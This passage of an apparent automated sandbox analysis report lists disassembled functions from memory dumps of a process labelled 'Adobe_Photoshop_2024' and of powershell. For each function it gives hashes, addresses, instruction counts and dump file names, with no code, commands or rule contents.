                        • Instruction ID: 07ced111b817b82985a9e300e9e66287cdb328bcc5c44a960f5435de42990284
                        • Opcode Fuzzy Hash: 8e1c62d6eb927dca8422e4bdc34fc78e0f3d4760726e27adff549d45dd372538
                        • Instruction Fuzzy Hash: 6D52616244E3C19FC7535F7498B51D17FB0EE67218B1E09DBC4C18F0A3E22959AACB62
                        Function 0525BF91 Relevance: .7, Instructions: 692COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2105155638.0000000005252000.00000002.00000001.01000000.00000009.sdmp, Offset: 05250000, based on PE: true
                        • Associated: 00000006.00000002.2105094198.0000000005250000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5250000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4636a952eb3db545ae7e0a4ab5a6296c85154868e5a0427bb783ab44d08375d0
                        • Instruction ID: 245dcceb9dceef0d938ae3c37eebd97ca606e9459d7352b3e8c4ba42a98a0d1a
                        • Opcode Fuzzy Hash: 4636a952eb3db545ae7e0a4ab5a6296c85154868e5a0427bb783ab44d08375d0
                        • Instruction Fuzzy Hash: 48527CA244E3C15FD707CB348CAA6917FB0AE1721875E86DFC4C48F4A3D25E591AC762
                        Function 01334A88 Relevance: .5, Instructions: 476COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2103314520.0000000001332000.00000002.00000001.01000000.00000008.sdmp, Offset: 01330000, based on PE: true
                        • Associated: 00000006.00000002.2103294048.0000000001330000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 00000006.00000002.2103376587.000000000133C000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1330000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0c0473401cb7634d20d06459fd6291fc0aa171a90e0d357037e01b632dcff535
                        • Instruction ID: 68a63c7afeeee630d919b1d2de7f9b8c40ec305d655d44d5865d3ccc59f21d0d
                        • Opcode Fuzzy Hash: 0c0473401cb7634d20d06459fd6291fc0aa171a90e0d357037e01b632dcff535
                        • Instruction Fuzzy Hash: FD12246244E3C29FDB538B748CB5591BFB0AE5321471E49DBC4C0CF0A3E21D5A9ADB62
                        Function 0575D4EA Relevance: .3, Instructions: 281COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2106353929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5750000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b83836989c6c278ade7d25df38864de9cd7a8059c5e0fe20798a9d66b6a3faae
                        • Instruction ID: 4814b7c418b6de6bb9642327d3c5f979ae36381be2926334f7899a0d12d25a7d
                        • Opcode Fuzzy Hash: b83836989c6c278ade7d25df38864de9cd7a8059c5e0fe20798a9d66b6a3faae
                        • Instruction Fuzzy Hash: E8C14D71E00218CFDB24DF65C884B99BBF2BF84320F14C5AAD849AB255DBB4DA85DF50
                        Function 05254D7D Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2105155638.0000000005252000.00000002.00000001.01000000.00000009.sdmp, Offset: 05250000, based on PE: true
                        • Associated: 00000006.00000002.2105094198.0000000005250000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5250000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b9b68acdef625aa47685ecc3113e0d6d6d6bb6668472a0798227e4a471806cdd
                        • Instruction ID: 203e2cf09f3c88e0efb1a771272278f1d102a16749291a93040ee6f3dd4772ac
                        • Opcode Fuzzy Hash: b9b68acdef625aa47685ecc3113e0d6d6d6bb6668472a0798227e4a471806cdd
                        • Instruction Fuzzy Hash: B601E47100E3C1AFEB435B7488317D27FB8AF97224B1901CAD4C18F163D2295915DBB4

                        Executed Functions

                        Function 04E76580 Relevance: .7, Instructions: 711COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a709d392131394806cfd8ae04d22c58d9937c215c60eae1f7fc3a66a594fdf07
                        • Instruction ID: 8ba3981f76851de18fc80f8eee2d9fbc2816700c26eaa4ab3c16a78a182d9946
                        • Opcode Fuzzy Hash: a709d392131394806cfd8ae04d22c58d9937c215c60eae1f7fc3a66a594fdf07
                        • Instruction Fuzzy Hash: 5752A070B00619CFDB14DF74D8547ADBBB2AF88328F10959AD509EB351EB34A986CF81
                        Function 04E7B6B9 Relevance: .3, Instructions: 254COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b68d9225ec8c29b92c19e6d026464ff124b470567ad44eb33e0831cec29b8b62
                        • Instruction ID: 4ad28aa2cfe68dfa369941337180af0eeb844956614772d26dc728fdf0d82fa8
                        • Opcode Fuzzy Hash: b68d9225ec8c29b92c19e6d026464ff124b470567ad44eb33e0831cec29b8b62
                        • Instruction Fuzzy Hash: 3791B0B5B006155BEB19EFB494005AEB7F6EF84614B00C92DD14AAB350EF74AA06CBD2
                        Function 04E7B6C8 Relevance: .3, Instructions: 252COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d883f55d02aa639e52d02f71efc1fb571ccf95ab41e00b0538edc572d83ef417
                        • Instruction ID: 14475108c322909fcaf2471d0ba19b2aa2eede3a92c6028418bc2b16399816de
                        • Opcode Fuzzy Hash: d883f55d02aa639e52d02f71efc1fb571ccf95ab41e00b0538edc572d83ef417
                        • Instruction Fuzzy Hash: 3091B0B5B007155BEB09EFB494005AEB7F6EF84614B00C92DD14AAB350EF74AA06CBD2
                        Function 07C306DF Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2096074054.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7c30000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: $]q$$]q
                        • API String ID: 0-127220927
                        • Opcode ID: 7e463572aa8f44cff3e35ae523c60b64edfe598589e9c39bd09339eae2edd453
                        • Instruction ID: 86b93781a8a48bab95a17bbebde502c042585734458de9d0d24d9668bc62a21b
                        • Opcode Fuzzy Hash: 7e463572aa8f44cff3e35ae523c60b64edfe598589e9c39bd09339eae2edd453
                        • Instruction Fuzzy Hash: ED0126F66893829FD33602285861072BBA69FC775271944ABD440CB656CB744D86CBF2
                        Function 04E7B1D0 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: (&]q
                        • API String ID: 0-1343553580
                        • Opcode ID: e19afe6ef3e980711c586537f629d8233a37c7da9647ce48c22f7f77087d7175
                        • Instruction ID: 7fb7105361ae36b99e92e409810e24bb33b2b1350a849857cab9ae760abcdc38
                        • Opcode Fuzzy Hash: e19afe6ef3e980711c586537f629d8233a37c7da9647ce48c22f7f77087d7175
                        • Instruction Fuzzy Hash: BA21AE75A002588FCB14DFAEE44469EBFF5EF89324F24846AD508E7340CA75A845CBE5
                        Function 04E771D8 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4']q
                        • API String ID: 0-1259897404
                        • Opcode ID: 3d4583ca555d9dada596ea8e14f9fa493fef357663565e43d3ebdb4cf84d271c
                        • Instruction ID: 27d19050748de7ee6d4c93a7ad4bd2fdb8ffc11b2da9e3594ed1e64dafa94ca6
                        • Opcode Fuzzy Hash: 3d4583ca555d9dada596ea8e14f9fa493fef357663565e43d3ebdb4cf84d271c
                        • Instruction Fuzzy Hash: F201A1343403045BD718EA65FC41FAE365BEFC0714F504968D5495F2A9CE65AD0A87D1
                        Function 04E7DD01 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 8aq
                        • API String ID: 0-538729646
                        • Opcode ID: dd9424a48735ddebe8853ef5d5eff719962e6373cf19de41cf46ffc98edbb81c
                        • Instruction ID: 7097ec0728f2bfa0bc1f3c66562a7b87160225f33301045931e0a648537e86cf
                        • Opcode Fuzzy Hash: dd9424a48735ddebe8853ef5d5eff719962e6373cf19de41cf46ffc98edbb81c
                        • Instruction Fuzzy Hash: 3C11C635200350CFC305EB78E918E6A7BE6EF89324F0545EAE649CF362DA649C0587E2
                        Function 04E771E8 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4']q
                        • API String ID: 0-1259897404
                        • Opcode ID: 1d1aa0f98162e4ed40214db2d8057b6a4a3b969f12a70ede2025f67c06347b0c
                        • Instruction ID: e309cf7f6ab01d58d3e7eddfec25cb52aa9ead08fdc26e151b58c734f616547a
                        • Opcode Fuzzy Hash: 1d1aa0f98162e4ed40214db2d8057b6a4a3b969f12a70ede2025f67c06347b0c
                        • Instruction Fuzzy Hash: E4F096353443002BD21CE66ABC91F5E769BFFC4A20F544978E1455F3A5CDA1EC4943D5
                        Function 07C306EF Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2096074054.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7c30000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: $]q
                        • API String ID: 0-1007455737
                        • Opcode ID: 149a85968cbbbc4b03fa2599280f8e3bc6e14d94e16e245eea33ff2b1bbcbc10
                        • Instruction ID: a1e2449be4b5069f2b2dc2504038314743fc0ccb17c12b236d66937b29fb1952
                        • Opcode Fuzzy Hash: 149a85968cbbbc4b03fa2599280f8e3bc6e14d94e16e245eea33ff2b1bbcbc10
                        • Instruction Fuzzy Hash: E1F027F228D381DFD73306285452176BBB2AB83712B1444ABE4408B542C7755AC0CBF2
                        Function 07C3077F Relevance: 1.0, Instructions: 998COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2096074054.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7c30000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 271576faad5dd7fd9ee5daaadad55c0ba820b35c18bfa081312864d58215b190
                        • Instruction ID: 051ecc7bd5c4af74d9a65e2f0b0fb51b89f4592ad1813e810f57544a4a1d98f0
                        • Opcode Fuzzy Hash: 271576faad5dd7fd9ee5daaadad55c0ba820b35c18bfa081312864d58215b190
                        • Instruction Fuzzy Hash: 473128B6B042159FCB109B2895507BA7BA3EF86211F14847BC545DB282DB76CB81C7E2
                        Function 04E729F0 Relevance: .2, Instructions: 207COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ff938ad618060d15b91f09f8e36371f4127b5470f96072f80bff7a4359c006ae
                        • Instruction ID: 613d49affebd3695e894c35f1640a5346c19f1d9ff584e3d436de7098c0650bd
                        • Opcode Fuzzy Hash: ff938ad618060d15b91f09f8e36371f4127b5470f96072f80bff7a4359c006ae
                        • Instruction Fuzzy Hash: E5919A74A002099FCB15CF59C5949AEFBB1FF88320B2486A9D955AB365C735FC81CBA0
                        Function 04E7C320 Relevance: .2, Instructions: 155COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 45843f530fedeec546a993b9f289fa1a712876f4f318f3d7957b5bfbbf64ee1f
                        • Instruction ID: e567bd78f450bad4c4338a2ba7ad234f648e7ff2ddd0324ffe7a77ec4c075438
                        • Opcode Fuzzy Hash: 45843f530fedeec546a993b9f289fa1a712876f4f318f3d7957b5bfbbf64ee1f
                        • Instruction Fuzzy Hash: 52612C71E002089FDB14DFA9D544ADDBBF5EF88314F249169D408AB368EB34AD45CB91
                        Function 04E7C311 Relevance: .1, Instructions: 149COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 555ea1b7e0dd6b413a13c13729b28e4bafeb8638e1d1b453951b9bb5694e3fbf
                        • Instruction ID: 310ee92eb0881fc2a03871e65f189c134e8d9813e01ff015491ec82882238a15
                        • Opcode Fuzzy Hash: 555ea1b7e0dd6b413a13c13729b28e4bafeb8638e1d1b453951b9bb5694e3fbf
                        • Instruction Fuzzy Hash: F6511C71E00248DFDB14DFA9D544A9DBBF5EF88314F14806AD809AB368EB34A945CF51
                        Function 04E7E84D Relevance: .1, Instructions: 137COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0404be094864816da2cdbbd4c03858fbfdd9b75e50ccccb0ad05c0868a949099
                        • Instruction ID: 4080c7b9bc99628c5272dc23a6978f0d9294914b3a3919eabf2b5d9054810cba
                        • Opcode Fuzzy Hash: 0404be094864816da2cdbbd4c03858fbfdd9b75e50ccccb0ad05c0868a949099
                        • Instruction Fuzzy Hash: E351D572E003499FDB05DFA8D8549EDBFF2FF89310F14916AD409AB261EB30A945CB90
                        Function 04E73C71 Relevance: .1, Instructions: 133COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 76c827597d328f466879b63764a8633f7787f5627616d11ab8708d6546adb51a
                        • Instruction ID: bca753bea0550522b5014085f0241c84e109d185e339d5cc85feec71ec706342
                        • Opcode Fuzzy Hash: 76c827597d328f466879b63764a8633f7787f5627616d11ab8708d6546adb51a
                        • Instruction Fuzzy Hash: DA418C34A002058FDB08DF69D4546AEBBF7FFC8310F188469D806AB3A5CB359C06DBA0
                        Function 04E77734 Relevance: .1, Instructions: 121COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f91f518412fc0c08f6d688c1d3e0ac8ecb9d727c0a80fd9b45fcbba110df3c31
                        • Instruction ID: 48cb7a09ea64ae05157a1dc3ad024c7498e9eab5840b1e8ee19a40ba6bc872d0
                        • Opcode Fuzzy Hash: f91f518412fc0c08f6d688c1d3e0ac8ecb9d727c0a80fd9b45fcbba110df3c31
                        • Instruction Fuzzy Hash: 38512E34A00209CFDB08DF68D584ADD7BB6FF88324F149568D801AB3A5DB74EC85CBA0
                        Function 04E73CA0 Relevance: .1, Instructions: 119COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 411fb161445d6a3213b9a0ce84e4923ad99013498a6f88b6fab32918e703309a
                        • Instruction ID: 001a39f8c8a991f3ae9c7f82475f96eeb2966d78cad2839549b210b107745211
                        • Opcode Fuzzy Hash: 411fb161445d6a3213b9a0ce84e4923ad99013498a6f88b6fab32918e703309a
                        • Instruction Fuzzy Hash: 44411E346002059FDB08DF69D554AAEBBF7EFC8310F18C469D806AB3A5DA359C46DBA0
                        Function 04E7E888 Relevance: .1, Instructions: 118COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 92a7578750275a524aa4d488b0c638cb3d14633b6c8d1fbd505fef52b4436e05
                        • Instruction ID: 49db5ec245cd5c789d8ebe7ca93ba346387f436534f49beef2259327548223e9
                        • Opcode Fuzzy Hash: 92a7578750275a524aa4d488b0c638cb3d14633b6c8d1fbd505fef52b4436e05
                        • Instruction Fuzzy Hash: 4D415072E007099FDF04DFA9D8449EDBBF2FF88320F149569E409AB255EB70A945CB90
                        Function 04E78BE7 Relevance: .1, Instructions: 115COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 708d2cddfa6852c4a60d5a323194516156c7860cfb41c1eaf8b483197f0a1566
                        • Instruction ID: c66f19818eab5d0f3371dd9639850a5562e7f74d195582ada55e0979ccbb4859
                        • Opcode Fuzzy Hash: 708d2cddfa6852c4a60d5a323194516156c7860cfb41c1eaf8b483197f0a1566
                        • Instruction Fuzzy Hash: CC41E275A063448FDB20EF6AD48C3DABFE6FF94334F2884AAC84D9B245D6346445CB52
                        Function 04E7FC98 Relevance: .1, Instructions: 109COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2d292ea99da9a0dc21ec51a60ff3bdc88afc58652b39a4694507aa0790a1e6b5
                        • Instruction ID: d304b1b3ca314e0fceee01d9aa46ad44e6744a090b85dba69327f20165168024
                        • Opcode Fuzzy Hash: 2d292ea99da9a0dc21ec51a60ff3bdc88afc58652b39a4694507aa0790a1e6b5
                        • Instruction Fuzzy Hash: 75413070E002089FDB04DFA8D594BEEBBF6EF88324F149069D915AB395DB749C41CB50
                        Function 04E7FCA8 Relevance: .1, Instructions: 108COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fe90593b015b42a04ab4b86a6c9a668e49d177f865866b7ae37823bdb18a1a71
                        • Instruction ID: 56a6a15db95440f94e2360cc5ee5c89576879eca84babc837ebed066c49575cf
                        • Opcode Fuzzy Hash: fe90593b015b42a04ab4b86a6c9a668e49d177f865866b7ae37823bdb18a1a71
                        • Instruction Fuzzy Hash: 89416F70E002089FDB04DFA9D494BAEBBF6EF88324F14D069E905AB391DB74AC41CB50
                        Function 04E7D9F7 Relevance: .1, Instructions: 99COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 287ca196714dcbb360d80373713c7a570c0b127ce06e2036f567c97f5c94fdc0
                        • Instruction ID: 779b9b7bd54dbc9e728af8cfc21db772e41942d866d4a3b263d19007cc016148
                        • Opcode Fuzzy Hash: 287ca196714dcbb360d80373713c7a570c0b127ce06e2036f567c97f5c94fdc0
                        • Instruction Fuzzy Hash: 6631AD787002049FC708DF79E95496ABBB6FFC8310B148568E54A8B365DA34EC06CB90
                        Function 04E7DA08 Relevance: .1, Instructions: 96COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b17f659cca5b8cefd505c165830bd08f422fba2bffea85cc5acc55ae99368aeb
                        • Instruction ID: c6193e3b1cc3cfa54fa48e4a0fa78ee3b98b7dfcf37f67eb7112ca4966262b3a
                        • Opcode Fuzzy Hash: b17f659cca5b8cefd505c165830bd08f422fba2bffea85cc5acc55ae99368aeb
                        • Instruction Fuzzy Hash: F3318C783002049FC708DF79E95496ABBFAFFC8310B148568E54A8B765CA35ED06CB90
                        Function 04E7B098 Relevance: .1, Instructions: 90COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e737014d7ad47cf37219a921a977f13f531a206a801abfce4ce6ee483a97900d
                        • Instruction ID: e4b6ee0370f4ef82ae92686a42e5b9ab36b82ebbe160cc9cc1c9c67e9936e51c
                        • Opcode Fuzzy Hash: e737014d7ad47cf37219a921a977f13f531a206a801abfce4ce6ee483a97900d
                        • Instruction Fuzzy Hash: F2316D70E002099FDB04DFAAD4947AEBBF6EF88364F109029E505EB354EB75AC418B91
                        Function 04E7B0A8 Relevance: .1, Instructions: 84COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 208d6a18a2fe868da92441630288fc4e1f00f1abe821a42bcf0b49496d515672
                        • Instruction ID: 73e2a47b4a601106f306d2fdc76477b6db64ea7e21218d66fe2bfda4d6289c43
                        • Opcode Fuzzy Hash: 208d6a18a2fe868da92441630288fc4e1f00f1abe821a42bcf0b49496d515672
                        • Instruction Fuzzy Hash: 80312F70F002099FDB04DFAAD4957AEBBF6AF88364F149029E405EB354EB75AC418F91
                        Function 04E7F3F5 Relevance: .1, Instructions: 84COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 20756fbc9ad7a7226bd6fd7e576ed77c21e72be26d5e79200d56549d2c7c0ea2
                        • Instruction ID: bf247ea31d62265ede3e0d2e5efd01a6c336c152f348324e54fb8a0db49d87aa
                        • Opcode Fuzzy Hash: 20756fbc9ad7a7226bd6fd7e576ed77c21e72be26d5e79200d56549d2c7c0ea2
                        • Instruction Fuzzy Hash: 58311C70E40209CBEB14DFA9D585BEDBBF1AF48328F24A068D505B7291FB78A945CF50
                        Function 04E7AF60 Relevance: .1, Instructions: 82COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c1a6e11a2c845758a52c416df53a2475173ef67520e04c1480564085f3512db
                        • Instruction ID: 1847350c3bea7c029655773a10936c47d9d93411ae80aef2f69218406cae52f8
                        • Opcode Fuzzy Hash: 7c1a6e11a2c845758a52c416df53a2475173ef67520e04c1480564085f3512db
                        • Instruction Fuzzy Hash: 71312FB8A006099FDB04EF64E858AEF77B6EFC4314F108468D615AB3A5DA359D01CBA1
                        Function 04E7F260 Relevance: .1, Instructions: 81COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 70a824bf5088567ee07d2373f893c3aaa591e572ae662f7c43961fa55d69ef62
                        • Instruction ID: bf19335e46090a800fdacac6e06a0a7956071faa6e15abfb1d96025ae9bf3d5f
                        • Opcode Fuzzy Hash: 70a824bf5088567ee07d2373f893c3aaa591e572ae662f7c43961fa55d69ef62
                        • Instruction Fuzzy Hash: 40314D71900349DEDB20DF9AC885BAFBBF4FF49724F248109EA1466280C375A545CBA1
                        Function 04E7AF70 Relevance: .1, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dfb2dd2150c417ff049c1c27e7fb5cb7a65d87b84cf52a501ad523c863167e76
                        • Instruction ID: 934cb8148033160aad7941bbdc21d49d011d2af48ae3fa563d08485d80fa3266
                        • Opcode Fuzzy Hash: dfb2dd2150c417ff049c1c27e7fb5cb7a65d87b84cf52a501ad523c863167e76
                        • Instruction Fuzzy Hash: C531FF78A006099FDB08EF64E458AAF77B6FFC4314F108469D615AB3A4DB35DD018BA1
                        Function 0357ED58 Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
